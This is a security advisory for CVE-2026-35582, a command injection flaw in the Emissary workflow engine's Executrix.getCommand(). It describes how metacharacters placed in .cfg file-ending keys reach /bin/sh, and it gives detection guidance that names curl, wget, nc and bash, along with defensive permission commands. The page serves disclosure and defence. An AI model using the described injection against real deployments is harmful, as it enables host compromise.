CVE-2026-35582 Overview
CVE-2026-35582 is an OS command injection vulnerability in Emissary, the NSA's peer-to-peer data-driven workflow engine. The flaw resides in Executrix.getCommand(), which interpolates temporary file paths into a /bin/sh -c shell command string without escaping or input validation. The IN_FILE_ENDING and OUT_FILE_ENDING configuration keys flow directly into these paths. An attacker who can author or modify a .cfg file can inject arbitrary shell metacharacters that execute commands in the JVM process's security context. The issue affects Emissary versions 8.42.0 and below and is fixed in version 8.43.0.
Critical Impact
A place author with .cfg write access can achieve arbitrary OS command execution under the Emissary JVM identity, with full compromise of confidentiality, integrity, and availability on the host.
Affected Products
- NSA Emissary versions up to and including 8.42.0
- Deployments using Executrix with custom IN_FILE_ENDING or OUT_FILE_ENDING values
- Downstream frameworks embedding Emissary place configurations
Discovery Timeline
- 2026-04-18 - CVE-2026-35582 published to NVD
- 2026-04-24 - Last updated in NVD database
Technical Details for CVE-2026-35582
Vulnerability Analysis
The defect is classified under [CWE-78] (Improper Neutralization of Special Elements used in an OS Command). Emissary's Executrix.getCommand() method constructs a shell invocation by concatenating configuration-supplied strings into a /bin/sh -c command. The framework already enforces an allowlist on placeName before embedding it into the same shell string, but applies no equivalent sanitization to IN_FILE_ENDING or OUT_FILE_ENDING values. Because these values become part of temporary file paths inside an unescaped shell string, any shell metacharacter introduced through configuration is interpreted by /bin/sh rather than treated as a literal filename component.
Root Cause
The root cause is missing input neutralization at a framework boundary. Executrix neither escapes file ending values nor documents preconditions forbidding shell metacharacters in those fields. Downstream implementors have no safe way to mitigate the issue at the configuration layer because the unsafe concatenation occurs inside the framework itself.
Attack Vector
Exploitation requires local configuration authorship. An attacker who can write or modify a place .cfg file sets IN_FILE_ENDING or OUT_FILE_ENDING to a value containing characters such as ;, `, $(), or |. When Emissary executes the place, Executrix.getCommand() interpolates the malicious string into the /bin/sh -c invocation, and the shell evaluates the injected metacharacters as commands. No API access, network access, or runtime privileges beyond configuration authorship are required. Because the scope changes (CVSS S:C), injected commands run with the privileges of the Emissary JVM, which may exceed those of the configuration author.
// No verified public proof-of-concept code is available.
// Refer to the GitHub Security Advisory and patch commit for technical details.
Detection Methods for CVE-2026-35582
Indicators of Compromise
- Unexpected child processes spawned by the Emissary JVM, particularly /bin/sh -c invocations with embedded metacharacters
- Modifications to .cfg files containing IN_FILE_ENDING or OUT_FILE_ENDING values with shell special characters such as ;, |, `, or $()
- Outbound network connections or file writes from the Emissary process inconsistent with normal workflow behavior
Detection Strategies
- Audit all Emissary .cfg files for non-alphanumeric characters in IN_FILE_ENDING and OUT_FILE_ENDING keys
- Monitor process trees for shell processes whose parent is the Emissary Java process and correlate against the place execution schedule
- Apply file integrity monitoring to the Emissary configuration directory and alert on unauthorized writes
Monitoring Recommendations
- Forward Emissary process telemetry and host shell execution logs to a centralized analytics platform for behavioral analysis
- Alert when the Emissary JVM executes commands referencing unexpected binaries such as curl, wget, nc, or bash
- Track configuration commits in version control and require code review for changes to file ending fields
How to Mitigate CVE-2026-35582
Immediate Actions Required
- Upgrade Emissary to version 8.43.0 or later, which fixes the unsafe command construction in Executrix.getCommand()
- Restrict write permissions on Emissary .cfg files to a minimal set of trusted operators
- Inventory existing configurations and remove any IN_FILE_ENDING or OUT_FILE_ENDING values containing shell metacharacters
Patch Information
The fix is delivered in Emissary 8.43.0. Review the upstream patch in the GitHub commit 1faf33f and the GitHub Security Advisory GHSA-3p24-9x7v-7789 for full remediation details.
Workarounds
- No safe downstream workaround exists because the unsafe concatenation occurs inside the framework; upgrading is required
- As a temporary compensating control, run Emissary under a dedicated low-privilege service account with restricted filesystem and network access
- Enforce mandatory access controls such as SELinux or AppArmor profiles to limit what the JVM child shell can execute
# Compensating control example: restrict configuration write access
chown -R emissary:emissary /opt/emissary/config
chmod 750 /opt/emissary/config
find /opt/emissary/config -name '*.cfg' -exec chmod 640 {} \;
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
